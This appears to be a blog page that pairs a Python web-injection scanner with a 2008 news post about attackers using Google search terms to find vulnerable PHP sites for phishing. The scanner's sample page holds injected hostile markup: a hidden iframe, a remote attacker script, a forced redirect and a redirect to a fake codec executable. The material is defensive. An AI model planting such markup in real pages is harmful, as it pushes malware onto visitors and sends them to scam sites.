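def scan_html(html, site_host, known_bad=()):
    """Return every injection finding for a page served from site_host."""
    scanner = InjectionScanner(site_host, known_bad)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page on www.shop-example.com after an injection.
SAMPLE_PAGE = """<html><head><title>Catalog</title>
<meta http-equiv="refresh" content="0;url=http://pharmacy-doorway-example.invalid/">
<script src="/js/site.js"></script>
<script src="http://direct84.com/js.js"></script>
</head><body><h1>Catalog</h1>
<iframe src="http://www.shop-example.com/help" width="400" height="300"></iframe>
<iframe src="http://adword71.com/ad.htm" width="0" height="0" style="display: none"></iframe>
<script>window.location="http://fake-codec-example.invalid/codec.exe";</script>
</body></html>"""
```

Fetched pages, not the files on disk, are what should be scanned, since the Asprox tool injects its markup into database content that only appears once the page is rendered; a nightly crawl of the site’s own URLs with this scanner catches that, and the known-bad list can be fed from the hosts seen in earlier findings.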

Google Helps Most Phishing Sites

Friday, March 28th, 2008

Researchers from MarkMonitor, a brand-protection firm, compiled a list of 750 Google search terms used to track down websites likely to have easily exploitable vulnerabilities, mostly PHP-based sites. According to the research, three-quarters of phishing sites are built on hacked servers that were found using pre-programmed Google search terms. Among other activities, MarkMonitor tracks phishing attacks that target brand names.

MarkMonitor found that 75 percent of the phishing sites it had discovered had been originally tracked down using one of the list of 750 Google search terms. The finding was based on a sample of one-quarter of the phishing sites logged by the firm.

The search terms return a list of sites likely to have particular vulnerabilities; the attackers then exploit the vulnerability, gain access to the site, and use it to host malicious code, counterfeit web pages (phishing) and spam-redirection “doorways” as part of the scam. The search terms are actively traded on Internet forums and are routinely run by IRC-based “bots”, which also scan Yahoo and AOL Search results, according to MarkMonitor.

Google has already moved to block automated exploitation, but the terms can still be used manually. The websites exploited tend to be small, local PHP-based sites, which are less likely to have the latest patches installed, and are broken into via one of more than 1,800 known PHP bugs.

Auction sites are the biggest targets, accounting for 44 percent of the phishing emails in the fourth quarter, up from 36 percent in the first quarter of 2007. In the fourth quarter of 2007, 412 organisations were targeted by phishing attacks, up 37 percent from the same period in 2006, according to the firm’s brand-jacking index, published last month.
